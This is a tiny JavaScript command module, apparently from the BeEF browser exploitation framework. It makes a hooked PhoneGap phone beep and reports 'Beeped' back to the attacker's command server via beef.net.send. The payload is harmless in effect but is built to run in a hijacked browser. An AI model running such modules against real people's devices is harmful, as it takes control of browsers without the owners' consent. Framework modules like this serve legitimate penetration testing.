8 lines
168 B
JavaScript
8 lines
168 B
JavaScript
//
|
|
// make the phone beep
|
|
//
|
|
beef.execute(function() {
|
|
navigator.notification.beep(1);
|
|
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'Beeped');
|
|
});
|